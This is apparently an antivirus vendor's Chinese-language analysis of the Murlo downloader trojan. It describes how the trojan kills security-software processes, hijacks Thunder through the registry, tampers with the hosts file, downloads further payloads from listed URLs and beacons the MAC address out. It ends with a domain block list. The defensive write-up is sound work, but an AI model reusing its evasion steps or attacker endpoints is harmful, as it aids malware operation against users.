Trojan/Win32.Murlo.aab[Downloader]

病毒标签：病毒名称： Trojan/Win32.Murlo.aab[Downloader]

病毒类型：木马

文件 MD5： 460CDB6F5016A870FB7B36B45A79C586

公开范围：完全公开

危害等级： 5

文件长度： 39,245 字节

感染系统： Windows98以上版本

开发工具： Microsoft Visual C++ 6.0

加壳类型： FSG 2.0 -> bart/xt

病毒描述：该病毒为后门类，病毒运行后判断该进程执行的线程数，如果小于或等于10个，则退出程序；判断创建的互斥体是否名为"puuyt"，若此互斥变量存在，则退出进程；解密数据释放文件"1696"到%Temp%目录下；解密数据得到安全软件的进程名称后查看进程列表，如果存在，结束进程；添加映像劫持使下载软件迅雷无法使用；若发现机器中运行360保险箱，获取该程序的执行路径并尝试通过在命令行中加入/u参数对其进行卸载；修改注册表通过关闭360服务的方式使360失效；衍生文件"1"到%Windir%asks目录下，并将该文件拷贝到所有非系统驱动器下含扩展名为"exe"文件的目录下，并更名为usp10.dll；创建线程监视当前窗口类名是否为"AfxControlBar42s"，如果是则关闭该窗口；修改注册表隐藏具有隐藏属性的文件，隐藏具有系统属性的文件；创建线程监视进程列表中是否存在进程名为"cmd.exe"或"Thunder5.exe"的进程，如果存在关闭该进程；连接网络下载病毒地址列表，并依照列表下载病毒文件并执行；获取本机信息发送到指定地址；下载文件替换正常的hosts文件屏蔽部分域名；下载病毒文件的最新版本并执行；修改注册表创建服务提权，执行后删除服务和文件；修改系统输入法文件。

行为分析-本地行为：1、文件运行后会释放以下文件

%System32%ctfmon.exe

%Windir%Tasks1

%Temp%1696

%非系统驱动器下的含exe文件的目录%usp10.dll

2、新增注册表

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden

新: DWORD: 2 (0x2)

旧: DWORD: 1 (0x1)

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden

新: DWORD: 0 (0)

旧: DWORD: 1 (0x1)

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsThunder5.exeDebugger

键值: 字符串: "svchost.exe"

3、遍历进程，对特定进程进行处理

（1）结束下列进程名

kavstart.exe、kissvc.exe、kmailmon.exe、kpfw32.exe、kpfwsvc.exe、kwatch.exe、ccenter.exe、ras.exe、rstray.exe、rsagent.exe、ravtask.exe、ravstub.exe、ravmon.exe、ravmond.exe avp.exe、360safebox.exe、360Safe.exe、Thunder5.exe、rfwmain.exe、rfwstub.exe、rfwsrv.exe

（2）对下面的进程进行实时监控，一经发现马上关闭

cmd.exe、thunder5.exe

4、检测当前窗口的类名称是否为"AfxControlBar42s"

向该窗口发送WM_CLOSE消息，并模拟键盘的回车键

5、创建提权服务，提升为SeDebugPrivilege权限

服务在注册表中的路径为：

HKLMSYSTEMCurrentControlSetServicesio

6、调用控制码替换系统文件

建立“\.safebreas” 通过DeviceIoControl调用0x22001c，替换系统文件ctfmon.exe

行为分析-网络行为：1、连接网络下载病毒列表、依照列表下载样本并执行

地址：http://txt.hsdee**.com/oo.txt

IP:59.34.198.***

内容：

[file]

open=y

url1=http://www.wdswe**.com/new/new1.exe

url2=http://www.wdswe**.com/new/new2.exe

url3=http://www.wdswe**.com/new/new3.exe

url4=http://www.wdswe**.com/new/new4.exe

url5=http://www.wdswe**.com/new/new5.exe

url6=http://www.wdswe**.com/new/new6.exe

url7=http://www.wdswe**.com/new/new7.exe

url8=http://www.wdswe**.com/new/new8.exe

url9=http://www.wdswe**.com/new/new9.exe

url10=http://www.wdswe**.com/new/new10.exe

url11=http://www.wdswe**.com/new/new11.exe

url12=http://www.wdswe**.com/new/new12.exe

url13=http://www.wdswe**.com/new/new13.exe

url14=http://www.wdswe**.com/new/new14.exe

url15=http://www.wdswe**.com/new/new15.exe

url16=http://www1.wdswe**.com/new/new16.exe

url17=http://www1.wdswe**.com/new/new17.exe

url18=http://www1.wdswe**.com/new/new18.exe

url19=http://www1.wdswe**.com/new/new19.exe

url20=http://www1.wdswe**.com/new/new20.exe

url21=http://www1.wdswe**.com/new/new21.exe

url22=http://www1.wdswe**.com/new/new22.exe

url23=http://www1.wdswe**.com/new/new23.exe

url24=http://www1.wdswe**.com/new/new24.exe

url25=http://www1.wdswe**.com/new/new25.exe

url26=http://www1.wdswe**.com/new/new26.exe

url27=http://www1.wdswe**.com/new/new27.exe

url28=http://www1.wdswe**.com/new/new28.exe

count=28

2、下载文件替换hosts文件

地址：http://txt.hsdee**.com/ad.jpg

IP：59.34.1***.109

内容：

127.0.0.1** v.onondown**.com.cn

127.0.0.2** ymsdasdw1**.cn

127.0.0.3** h96b**.info

127.0.0.0** fuck.zttwp**.cn

127.0.0.0** www.hackerbf**.cn

127.0.0.0** zzz.2008wyt**.net

127.1.1.1** 999.2005wyt**.com

127.0.0.0** ww.popdm**.cn

127.1.1.1** bbt.etimes888**.com

127.1.1.1** 219.147.13.53*

127.1.1.1** dl.360safe**.com

127.1.1.1** 20068080**.cn

127.1.1.1** l.neter888**.cn

127.1.1.1** stat.untang**.com

127.1.1.1** www.ikdy**.cn

127.0.0.0** geekbyfeng**.cn

127.0.0.0** 121.14.101.68*

127.0.0.0** ppp.etimes888**.com

127.0.0.0** www.bypk**.com

127.0.0.0** CSC3-2004-crl.verisign**.com

127.0.0.1** va9sdhun23**.cn

127.0.0.0** udp.hjob123**.com

127.1.1.1** 999.hfdy2828**.com

127.1.1.1** www.hfdy2929**.com

127.1.1.1** www.xiazaide1**.cn

127.1.1.1** www.vuf51579**.cn

127.1.1.1** wm.eo2q**.cn

127.1.1.1** d.www-263**.com

127.1.1.1** www.ssy1688**.cn

127.1.1.1** 121.12.173.21*

127.1.1.1** qq.18i16**.net

127.1.1.1** a.baidu-6661**.com

127.1.1.1** www.vuf51579**.cn

127.1.1.1** www.1079223105**.cn

127.1.1.1** home.xzx6**.cn

127.1.1.1** top.fgc3**.cn

127.1.1.1** 165.246.44.22*

127.1.1.1** wwww.ttfafa*.com

127.1.1.1** pa.tt-09**.com

127.0.0.2** bnasnd83nd**.cn

127.0.0.0** www.gamehacker**.com.cn

127.0.0.0** gamehacker.com**.cn

127.1.1.1** www.cctv-100008**.cn

127.1.1.1** 222.73.208.14*

127.0.0.3** adlaji**.cn

127.1.1.1** aiyyw**.com

127.0.0.1** 858656**.com

127.1.1.1** bnasnd83nd**.cn

127.0.0.1** my123**.com

127.0.0.0** user1.12-27**.net

127.0.0.1** 8749**.com

127.0.0.0** fengent**.cn

127.0.0.1** 4199**.com

127.0.0.1** user1.16-22**.net

127.0.0.1** 7379**.com

127.0.0.1** 2be37c5f.3f6e2cc5f0b**.com

127.0.0.1** 7255**.com

127.0.0.1** user1.23-12**.net

127.0.0.1** 3448**.com

127.0.0.1** www.guccia**.net

127.0.0.1** 7939**.com

127.0.0.1** a.o1o1o1**.nEt

127.0.0.1** 8009**.com

127.0.0.1** user1.12-73**.cn

127.0.0.1** piaoxue**.com

127.0.0.1** 3n8nlasd**.cn

127.0.0.1** kzdh**.com

127.0.0.0** www.sony888**.cn

127.0.0.1** about.blank**.la

127.0.0.0** user1.asp-33**.cn

127.0.0.1** 6781**.com

127.0.0.0** www.netkwek**.cn

127.0.0.1** 7322**.com

127.0.0.0** ymsdkad6**.cn

127.0.0.1** localhost**

127.0.0.0** www.lkwueir**.cn

127.0.0.1** 06.jacai**.com

127.0.1.1** user1.23-17**.net

127.0.0.1** 1.jopenkk**.com

127.0.0.0** upa.luzhiai**.net

127.0.0.1** 1.jopenqc**.com

127.0.0.0** www.guccia**.net

127.0.0.1** 1.joppnqq**.com

127.0.0.0** 4m9mnlmi**.cn

127.0.0.1** 1.xqhgm**.com

127.0.0.0** mm119mkssd**.cn

127.0.0.1** 100.332233**.com

127.0.0.0** 61.128.171.11*:8080

127.0.0.1** 121.11.90.79*

127.0.0.0** www.1119111**.com

127.0.0.1** 121565**.net

127.0.0.0** win.nihao69**.cn

127.0.0.1** 125.90.88.38*

127.0.0.1** 16888.6to23**.com

127.0.0.1** 2.joppnqq**.com

127.0.0.0** puc.lianxiac**.net

127.0.0.1** 204.177.92.68*

127.0.0.0** pud.lianxiac**.net

127.0.0.1** 210.74.145.23*

127.0.0.0** 210.76.0.13*

127.0.0.1** 219.129.239.22*

127.0.0.0** 61.166.32.2*

127.0.0.1** 219.153.40.22*

127.0.0.0** 218.92.186.27*

127.0.0.1** 219.153.46.27*

127.0.0.0** www.fsfsfag**.cn

127.0.0.1** 219.153.52.12*

127.0.0.0** ovo.ovovov**.cn

127.0.0.1** 221.195.42.71*

127.0.0.0** dw.com**.com

127.0.0.1** 222.73.218.11*

127.0.0.1** 203.110.168.23*:80

127.0.0.1** 3.joppnqq**.com

127.0.0.1** 203.110.168.22*:80

127.0.0.1** 363xx**.com

127.0.0.1** www1.ip10086**.com.cm

127.0.0.1** 4199**.com

127.0.0.1** blog.ip10086**.com.cn

127.0.0.1** 43242**.com

127.0.0.1** www.ccji68**.cn

127.0.0.1** 5.xqhgm**.com

127.0.0.0** t.myblank**.cn

127.0.0.1** 520.mm5208**.com

127.0.0.0** x.myblank**.cn

127.0.0.1** 59.34.131.54*

127.0.0.1** 210.51.45.5*

127.0.0.1** 59.34.198.22*

127.0.0.1** www.ew1q**.cn

127.0.0.1** 59.34.198.8*

127.0.0.1** 59.34.198.97*

127.0.0.1** 60.190.114.10*

127.0.0.1** 60.190.218.34*

127.0.0.0** qq-xing.com**.cn

127.0.0.1** 60.191.124.25*

127.0.0.1** 61.145.117.21*

127.0.0.1** 61.157.109.22*

127.0.0.1** 75.126.3.21*

127.0.0.1** 220.250.64.21*

127.0.0.1** 75.126.3.21*

127.0.0.0** 59.125.231.17*:17777

127.0.0.1** 75.126.3.22*

127.0.0.1** 772630**.com

127.0.0.1** 832823**.cn

127.0.0.1** 8749**.com

127.0.0.1** 888.jopenqc**.com

127.0.0.1** 89382**.cn

127.0.0.1** 8v8**.biz

127.0.0.1** 97725**.com

127.0.0.1** 9gg**.biz

127.0.0.1** www.9000music**.com

127.0.0.1** test.591jx**.com

127.0.0.1** a.topxxxx**.cn

127.0.0.1** picon.chinaren**.com

127.0.0.1** www.5566**.net

127.0.0.1** p.qqkx**.com

127.0.0.1** news.netandtv**.com

127.0.0.1** z.neter888**.cn

127.0.0.1** b.myblank**.cn

127.0.0.1** wvw.wokutu**.com

127.0.0.1** unionch.qyule**.com

127.0.0.1** www.qyule**.com

127.0.0.1** it.itjc**.cn

127.0.0.1** www.linkwww**.com

127.0.0.1** vod.kaicn**.com

127.0.0.1** www.tx8688**.com

127.0.0.1** b.neter888**.cn

127.0.0.1** promote.huanqiu**.com

127.0.0.1** www.huanqiu**.com

127.0.0.1** www.haokanla**.com

127.0.0.1** play.unionsky**.cn

127.0.0.1** www.52v**.com

127.0.0.1** www.gghka**.cn

127.0.0.1** icon.ajiang**.net

127.0.0.1** new.ete**.cn

127.0.0.1** www.stiae**.cn

127.0.0.1** o.neter888**.cn

127.0.0.1** comm.jinti**.com

127.0.0.1** www.google-analytics**.com

127.0.0.1** hz.mmstat**.com

127.0.0.1** www.game175**.cn

127.0.0.1** x.neter888**.cn

127.0.0.1** z.neter888**.cn

127.0.0.1** p.etimes888**.com

127.0.0.1** hx.etimes888**.com

127.0.0.1** abc.qqkx**.com

127.0.0.1** dm.popdm**.cn

127.0.0.1** www.yl9999**.com

127.0.0.1** www.dajiadoushe**.cn

127.0.0.1** v.onondown.com**.cn

127.0.0.1** www.interoo**.net

127.0.0.1** bally1.bally-bally**.net

127.0.0.1** www.bao5605509**.cn

127.0.0.1** www.rty456**.cn

127.0.0.1** www.werqwer**.cn

127.0.0.1** 1.360-1**.cn

127.0.0.1** user1.23-16**.net

127.0.0.1** www.guccia**.net

127.0.0.1** www.interoo**.net

127.0.0.1** upa.netsool**.net

127.0.0.1** js.users.51**.la

127.0.0.1** vip2.51**.la

127.0.0.1** web.51**.la

127.0.0.1** qq.gong2008**.com

127.0.0.1** 2008tl.copyip**.com

127.0.0.1** tla.laozihuolaile**.cn

127.0.0.1** www.tx6868**.cn

127.0.0.1** p001.tiloaiai**.com

127.0.0.1** s1.tl8tl**.com

127.0.0.1** s1.gong2008**.com

127.0.0.1** 4b3ce56f9g.3f6e2cc5f0b**.com

127.0.0.1** 2be37c5f.3f6e2cc5f0b**.com

3、向服务器回传本地信息

（1）回传本地mac地址和病毒版本

http://tongji.ombb888**.cn/select/getmac.asp?x= 00-0C-29-9C-7B-01&y=a1&t= 401595

（2）如果进程中有QQ.exe则发送信息如下格式

http://tongji1.ac5566**.cn/getmac.asp?x=00-0C-29-9C-7B-01&y=a1&t=IQQS

4、下载病毒的最新版本

地址1：http://www.hoho-3**.cn/gr.exe

地址2：http://www.hoho-3**.cn/down/gr.exe

IP：59.34.198.10*

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:WinntSystem32，windows95/98/me中默认的安装路径是C:WindowsSystem，windowsXP中默认的安装路径是C:WindowsSystem32。

%Temp% = C:Documents and SettingsAAAAALocal SettingsTemp 当前用户TEMP缓存变量

%Windir% WINDODWS所在目录

%DriveLetter% 逻辑驱动器根目录

%ProgramFiles% 系统程序默认安装目录

%HomeDrive% = C: 当前启动的系统的所在分区

%Documents and Settings% 当前用户文档根目录

建议方案：在hosts文件中屏蔽如下域名：

127.0.0.1 www.hoho-3.cn

127.0.0.1 tongji1.ac5566.cn

127.0.0.1 tongji.ombb888.cn

127.0.0.1 txt.hsdee.com

127.0.0.1 www1.wdswe.com

127.0.0.1 www.wdswe.com